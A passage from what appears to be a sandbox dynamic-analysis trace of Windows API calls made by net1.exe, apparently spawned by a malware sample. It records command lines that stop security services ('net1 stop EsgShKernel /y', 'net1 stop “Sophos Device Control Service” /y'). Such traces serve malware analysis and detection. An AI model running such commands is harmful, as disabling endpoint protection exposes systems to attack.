returned 9 [0120.939] _wcsicmp (_String1="redirector", _String2="EsgShKernel") returned 13 [0120.939] _wcsicmp (_String1="redir", _String2="EsgShKernel") returned 13 [0120.939] _wcsicmp (_String1="rdr", _String2="EsgShKernel") returned 13 [0120.939] _wcsicmp (_String1="workstation", _String2="EsgShKernel") returned 18 [0120.939] _wcsicmp (_String1="work", _String2="EsgShKernel") returned 18 [0120.939] _wcsicmp (_String1="wksta", _String2="EsgShKernel") returned 18 [0120.939] _wcsicmp (_String1="prdr", _String2="EsgShKernel") returned 11 [0120.939] _wcsicmp (_String1="devrdr", _String2="EsgShKernel") returned -1 [0120.939] _wcsicmp (_String1="lanmanworkstation", _String2="EsgShKernel") returned 7 [0120.939] _wcsicmp (_String1="server", _String2="EsgShKernel") returned 14 [0120.939] _wcsicmp (_String1="svr", _String2="EsgShKernel") returned 14 [0120.939] _wcsicmp (_String1="srv", _String2="EsgShKernel") returned 14 [0120.939] _wcsicmp (_String1="lanmanserver", _String2="EsgShKernel") returned 7 [0120.939] _wcsicmp (_String1="alerter", _String2="EsgShKernel") returned -4 [0120.939] _wcsicmp (_String1="netlogon", _String2="EsgShKernel") returned 9 [0120.939] _wcsupr (in: _String="EsgShKernel" | out: _String="ESGSHKERNEL") returned="ESGSHKERNEL" [0120.939] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1454a8 [0120.943] GetServiceKeyNameW (in: hSCManager=0x1454a8, lpDisplayName="ESGSHKERNEL", lpServiceName=0x39aaf0, lpcchBuffer=0x2ef7e0 | out: lpServiceName="", lpcchBuffer=0x2ef7e0) returned 0 [0120.944] _wcsicmp (_String1="msg", _String2="ESGSHKERNEL") returned 8 [0120.944] _wcsicmp (_String1="messenger", _String2="ESGSHKERNEL") returned 8 [0120.944] _wcsicmp (_String1="receiver", _String2="ESGSHKERNEL") returned 13 [0120.944] _wcsicmp (_String1="rcv", _String2="ESGSHKERNEL") returned 13 [0120.944] _wcsicmp (_String1="redirector", _String2="ESGSHKERNEL") returned 13 [0120.944] _wcsicmp (_String1="redir", _String2="ESGSHKERNEL") returned 13 [0120.944] _wcsicmp (_String1="rdr", _String2="ESGSHKERNEL") returned 13 [0120.944] _wcsicmp (_String1="workstation", _String2="ESGSHKERNEL") returned 18 [0120.944] _wcsicmp (_String1="work", _String2="ESGSHKERNEL") returned 18 [0120.944] _wcsicmp (_String1="wksta", _String2="ESGSHKERNEL") returned 18 [0120.944] _wcsicmp (_String1="prdr", _String2="ESGSHKERNEL") returned 11 [0120.944] _wcsicmp (_String1="devrdr", _String2="ESGSHKERNEL") returned -1 [0120.944] _wcsicmp (_String1="lanmanworkstation", _String2="ESGSHKERNEL") returned 7 [0120.944] _wcsicmp (_String1="server", _String2="ESGSHKERNEL") returned 14 [0120.944] _wcsicmp (_String1="svr", _String2="ESGSHKERNEL") returned 14 [0120.944] _wcsicmp (_String1="srv", _String2="ESGSHKERNEL") returned 14 [0120.944] _wcsicmp (_String1="lanmanserver", _String2="ESGSHKERNEL") returned 7 [0120.944] _wcsicmp (_String1="alerter", _String2="ESGSHKERNEL") returned -4 [0120.944] _wcsicmp (_String1="netlogon", _String2="ESGSHKERNEL") returned 9 [0120.944] NetServiceControl (in: servername=0x0, service="ESGSHKERNEL", opcode=0x0, arg=0x0, bufptr=0x2ef7dc | out: bufptr=0x2ef7dc) returned 0x889 [0120.946] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.946] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.946] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.947] GetFileType (hFile=0x0) returned 0x0 [0120.947] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x143ec8 [0120.947] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x143ec8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.947] WriteFile (in: hFile=0x0, lpBuffer=0x143ec8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ef71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef71c, lpOverlapped=0x0) returned 0 [0120.947] LocalFree (hMem=0x143ec8) returned 0x0 [0120.947] GetFileType (hFile=0x0) returned 0x0 [0120.948] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x146170 [0120.948] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x146170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x14", lpUsedDefaultChar=0x0) returned 2 [0120.948] WriteFile (in: hFile=0x0, lpBuffer=0x146170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ef71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef71c, lpOverlapped=0x0) returned 0 [0120.948] LocalFree (hMem=0x146170) returned 0x0 [0120.948] _ultow (in: _Dest=0x889, _Radix=3077964 | out: _Dest=0x889) returned="2185" [0120.948] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.948] GetFileType (hFile=0x0) returned 0x0 [0120.948] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x146170 [0120.948] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x146170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.948] WriteFile (in: hFile=0x0, lpBuffer=0x146170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ef728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef728, lpOverlapped=0x0) returned 0 [0120.948] LocalFree (hMem=0x146170) returned 0x0 [0120.948] GetFileType (hFile=0x0) returned 0x0 [0120.948] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x146170 [0120.948] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x146170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x14", lpUsedDefaultChar=0x0) returned 2 [0120.948] WriteFile (in: hFile=0x0, lpBuffer=0x146170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ef728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef728, lpOverlapped=0x0) returned 0 [0120.948] LocalFree (hMem=0x146170) returned 0x0 [0120.949] NetApiBufferFree (Buffer=0x141ae0) returned 0x0 [0120.949] NetApiBufferFree (Buffer=0x141af8) returned 0x0 [0120.949] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0120.949] exit (_Code=2) Process: id = "250" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fab9000" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0x102c" cmd_line = "C:\\Windows\\system32\\net1 stop “Sophos Device Control Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 647 os_tid = 0xd2c [0121.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfd7c | out: lpSystemTimeAsFileTime=0xcfd7c*(dwLowDateTime=0x1be35250, dwHighDateTime=0x1d6f0d1)) [0121.050] GetCurrentProcessId () returned 0xc70 [0121.050] GetCurrentThreadId () returned 0xd2c [0121.050] GetTickCount () returned 0x1151881 [0121.050] QueryPerformanceCounter (in: lpPerformanceCount=0xcfd74 | out: lpPerformanceCount=0xcfd74*=24015124860) returned 1 [0121.051] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0121.051] __set_app_type (_Type=0x1) [0121.051] __p__fmode () returned 0x770331f4 [0121.051] __p__commode () returned 0x770331fc [0121.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0121.051] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0121.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.052] GetConsoleOutputCP () returned 0x1b5 [0121.493] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0121.493] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.496] sprintf_s (in: _DstBuf=0xcfd34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0121.496] setlocale (category=0, locale=".437") returned="English_United States.437" [0121.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x47c [0121.499] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0121.499] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos Device Control Service” /y" [0121.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfb00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0121.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9e) returned 0x513b18 [0121.499] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0121.499] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfd04 | out: Buffer=0xcfd04*=0x511b20) returned 0x0 [0121.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfd04 | out: Buffer=0xcfd04*=0x511b38) returned 0x0 [0121.500] _fileno (_File=0x77032900) returned -2 [0121.500] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0121.500] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0121.500] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0121.500] _wcsicmp (_String1="config", _String2="stop") returned -16 [0121.500] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0121.500] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0121.500] _wcsicmp (_String1="file", _String2="stop") returned -13 [0121.500] _wcsicmp (_String1="files", _String2="stop") returned -13 [0121.500] _wcsicmp (_String1="group", _String2="stop") returned -12 [0121.500] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0121.500] _wcsicmp (_String1="help", _String2="stop") returned -11 [0121.500] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0121.500] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0121.500] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0121.500] _wcsicmp (_String1="session", _String2="stop") returned -15 [0121.500] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0121.500] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0121.500] _wcsicmp (_String1="share", _String2="stop") returned -12 [0121.500] _wcsicmp (_String1="start", _String2="stop") returned -14 [0121.500] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0121.500] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0121.500] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0121.500] _wcsicmp (_String1="accounts", _String2="“Sophos") returned -8123 [0121.500] _wcsicmp (_String1="computer", _String2="“Sophos") returned -8121 [0121.501] _wcsicmp (_String1="config", _String2="“Sophos") returned -8121 [0121.501] _wcsicmp (_String1="continue", _String2="“Sophos") returned -8121 [0121.501] _wcsicmp (_String1="cont", _String2="“Sophos") returned -8121 [0121.501] _wcsicmp (_String1="file", _String2="“Sophos") returned -8118 [0121.501] _wcsicmp (_String1="files", _String2="“Sophos") returned -8118 [0121.501] _wcsicmp (_String1="group", _String2="“Sophos") returned -8117 [0121.501] _wcsicmp (_String1="groups", _String2="“Sophos") returned -8117 [0121.501] _wcsicmp (_String1="help", _String2="“Sophos") returned -8116 [0121.501] _wcsicmp (_String1="helpmsg", _String2="“Sophos") returned -8116 [0121.501] _wcsicmp (_String1="localgroup", _String2="“Sophos") returned -8112 [0121.501] _wcsicmp (_String1="pause", _String2="“Sophos") returned -8108 [0121.501] _wcsicmp (_String1="session", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="sessions", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="sess", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="share", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="start", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="stats", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="statistics", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="stop", _String2="“Sophos") returned -8105 [0121.501] _wcsicmp (_String1="time", _String2="“Sophos") returned -8104 [0121.501] _wcsicmp (_String1="user", _String2="“Sophos") returned -8103 [0121.501] _wcsicmp (_String1="users", _String2="“Sophos") returned -8103 [0121.501] _wcsicmp (_String1="msg", _String2="“Sophos") returned -8111 [0121.501] _wcsicmp (_String1="messenger", _String2="“Sophos") returned -8111 [0121.501] _wcsicmp (_String1="receiver", _String2="“Sophos") returned -8106 [0121.501] _wcsicmp (_String1="rcv", _String2="“Sophos") returned -8106 [0121.501] _wcsicmp (_String1="netpopup", _String2="“Sophos") returned -8110 [0121.501] _wcsicmp (_String1="redirector", _String2="“Sophos") returned -8106 [0121.501] _wcsicmp (_String1="redir", _String2="“Sophos") returned -8106 [0121.501] _wcsicmp (_String1="rdr", _String2="“Sophos") returned -8106 [0121.501] _wcsicmp (_String1="workstation", _String2="“Sophos") returned -8101 [0121.501] _wcsicmp (_String1="work", _String2="“Sophos") returned -8101 [0121.501] _wcsicmp (_String1="wksta", _String2="“Sophos") returned -8101 [0121.501] _wcsicmp (_String1="prdr", _String2="“Sophos") returned -8108 [0121.501] _wcsicmp (_String1="devrdr", _String2="“Sophos") returned -8120 [0121.501] _wcsicmp (_String1="lanmanworkstation", _String2="“Sophos") returned -8112 [0121.502] _wcsicmp (_String1="server", _String2="“Sophos") returned -8105 [0121.502] _wcsicmp (_String1="svr", _String2="“Sophos") returned -8105 [0121.502] _wcsicmp (_String1="srv", _String2="“Sophos") returned -8105 [0121.502] _wcsicmp (_String1="lanmanserver", _String2="“Sophos") returned -8112 [0121.502] _wcsicmp (_String1="alerter", _String2="“Sophos") returned -8123 [0121.502] _wcsicmp (_String1="netlogon", _String2="“Sophos") returned -8110 [0121.502] _wcsicmp (_String1="accounts", _String2="Device") returned -3 [0121.502] _wcsicmp (_String1="computer", _String2="Device") returned -1 [0121.502] _wcsicmp (_String1="config", _String2="Device") returned -1 [0121.502] _wcsicmp (_String1="continue", _String2="Device") returned -1 [0121.502] _wcsicmp (_String1="cont", _String2="Device") returned -1 [0121.502] _wcsicmp (_String1="file", _String2="Device") returned 2 [0121.502] _wcsicmp (_String1="files", _String2="Device") returned 2 [0121.502] _wcsicmp (_String1="group", _String2="Device") returned 3 [0121.502] _wcsicmp (_String1="groups", _String2="Device") returned 3 [0121.502] _wcsicmp (_String1="help", _String2="Device") returned 4 [0121.502] _wcsicmp (_String1="helpmsg", _String2="Device") returned 4 [0121.502] _wcsicmp (_String1="localgroup", _String2="Device") returned 8 [0121.502] _wcsicmp (_String1="pause", _String2="Device") returned 12 [0121.502] _wcsicmp (_String1="session", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="sessions", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="sess", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="share", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="start", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="stats", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="statistics", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="stop", _String2="Device") returned 15 [0121.502] _wcsicmp (_String1="time", _String2="Device") returned 16 [0121.502] _wcsicmp (_String1="user", _String2="Device") returned 17 [0121.502] _wcsicmp (_String1="users", _String2="Device") returned 17 [0121.502] _wcsicmp (_String1="msg", _String2="Device") returned 9 [0121.503] _wcsicmp (_String1="messenger", _String2="Device") returned 9 [0121.503] _wcsicmp (_String1="receiver", _String2="Device") returned 14 [0121.503] _wcsicmp (_String1="rcv", _String2="Device") returned 14 [0121.503] _wcsicmp (_String1="netpopup", _String2="Device") returned 10 [0121.503] _wcsicmp (_String1="redirector", _String2="Device") returned 14 [0121.503] _wcsicmp (_String1="redir", _String2="Device") returned 14 [0121.503] _wcsicmp (_String1="rdr", _String2="Device") returned 14 [0121.503] _wcsicmp (_String1="workstation", _String2="Device") returned 19 [0121.503] _wcsicmp (_String1="work", _String2="Device") returned 19 [0121.503] _wcsicmp (_String1="wksta", _String2="Device") returned 19 [0121.503] _wcsicmp (_String1="prdr", _String2="Device") returned 12 [0121.503] _wcsicmp (_String1="devrdr", _String2="Device") returned 9 [0121.503] _wcsicmp (_String1="lanmanworkstation", _String2="Device") returned 8 [0121.503] _wcsicmp (_String1="server", _String2="Device") returned 15 [0121.503] _wcsicmp (_String1="svr", _String2="Device") returned 15 [0121.503] _wcsicmp (_String1="srv", _String2="Device") returned 15 [0121.503] _wcsicmp (_String1="lanmanserver", _String2="Device") returned 8 [0121.503] _wcsicmp (_String1="alerter", _String2="Device") returned -3 [0121.503] _wcsicmp (_String1="netlogon", _String2="Device") returned 10 [0121.503] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0121.503] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.504] wcscpy_s (in: _Destination=0xcf804, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0121.504] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74680000 [0121.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0xcf800, nSize=0x0, Arguments=0xcf7fc | out: lpBuffer="唰Qneth.dll") returned 0xff [0121.513] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0121.513] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.513] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0121.513] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0121.513] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0121.513] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.513] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0121.513] _wcsicmp (_String1="CONT", _String2="“Sophos") returned -8121 [0121.513] _wcsicmp (_String1="CONT", _String2="Device") returned -1 [0121.513] _wcsicmp (_String1="CONT", _String2="Control") returned -114 [0121.513] _wcsicmp (_String1="CONT", _String2="Service”") returned -16 [0121.513] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.514] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0121.514] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0121.514] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.514] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0121.514] _wcsicmp (_String1="FILES", _String2="“Sophos") returned -8118 [0121.514] _wcsicmp (_String1="FILES", _String2="Device") returned 2 [0121.514] _wcsicmp (_String1="FILES", _String2="Control") returned 3 [0121.514] _wcsicmp (_String1="FILES", _String2="Service”") returned -13 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.514] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0121.514] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0121.514] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.514] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0121.514] _wcsicmp (_String1="GROUPS", _String2="“Sophos") returned -8117 [0121.514] _wcsicmp (_String1="GROUPS", _String2="Device") returned 3 [0121.514] _wcsicmp (_String1="GROUPS", _String2="Control") returned 4 [0121.514] _wcsicmp (_String1="GROUPS", _String2="Service”") returned -12 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.514] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0121.514] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0121.514] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.514] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0121.514] _wcsicmp (_String1="REPL", _String2="“Sophos") returned -8106 [0121.514] _wcsicmp (_String1="REPL", _String2="Device") returned 14 [0121.514] _wcsicmp (_String1="REPL", _String2="Control") returned 15 [0121.514] _wcsicmp (_String1="REPL", _String2="Service”") returned -1 [0121.514] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0121.514] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.514] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0121.514] _wcsicmp (_String1="REPLICATOR", _String2="“Sophos") returned -8106 [0121.514] _wcsicmp (_String1="REPLICATOR", _String2="Device") returned 14 [0121.515] _wcsicmp (_String1="REPLICATOR", _String2="Control") returned 15 [0121.515] _wcsicmp (_String1="REPLICATOR", _String2="Service”") returned -1 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.515] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0121.515] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0121.515] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.515] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0121.515] _wcsicmp (_String1="SESSIONS", _String2="“Sophos") returned -8105 [0121.515] _wcsicmp (_String1="SESSIONS", _String2="Device") returned 15 [0121.515] _wcsicmp (_String1="SESSIONS", _String2="Control") returned 16 [0121.515] _wcsicmp (_String1="SESSIONS", _String2="Service”") returned 1 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0121.515] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0121.515] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0121.515] _wcsicmp (_String1="SESS", _String2="“Sophos") returned -8105 [0121.515] _wcsicmp (_String1="SESS", _String2="Device") returned 15 [0121.515] _wcsicmp (_String1="SESS", _String2="Control") returned 16 [0121.515] _wcsicmp (_String1="SESS", _String2="Service”") returned 1 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.515] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0121.515] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0121.515] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.515] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0121.515] _wcsicmp (_String1="STATS", _String2="“Sophos") returned -8105 [0121.515] _wcsicmp (_String1="STATS", _String2="Device") returned 15 [0121.515] _wcsicmp (_String1="STATS", _String2="Control") returned 16 [0121.515] _wcsicmp (_String1="STATS", _String2="Service”") returned 15 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0121.515] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0121.515] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0121.515] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0121.515] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0121.516] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0121.516] _wcsicmp (_String1="USERS", _String2="“Sophos") returned -8103 [0121.516] _wcsicmp (_String1="USERS", _String2="Device") returned 17 [0121.516] _wcsicmp (_String1="USERS", _String2="Control") returned 18 [0121.516] _wcsicmp (_String1="USERS", _String2="Service”") returned 2 [0121.516] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 